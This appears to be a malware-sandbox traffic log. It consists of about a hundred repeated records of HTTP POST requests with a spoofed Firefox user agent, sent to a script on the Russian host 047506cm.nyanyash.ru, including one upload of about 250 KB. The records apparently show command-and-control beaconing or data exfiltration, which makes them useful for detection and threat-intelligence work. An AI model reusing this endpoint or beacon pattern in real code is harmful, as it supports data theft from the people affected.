Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 249540Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1708Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1720Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1000Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1732Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
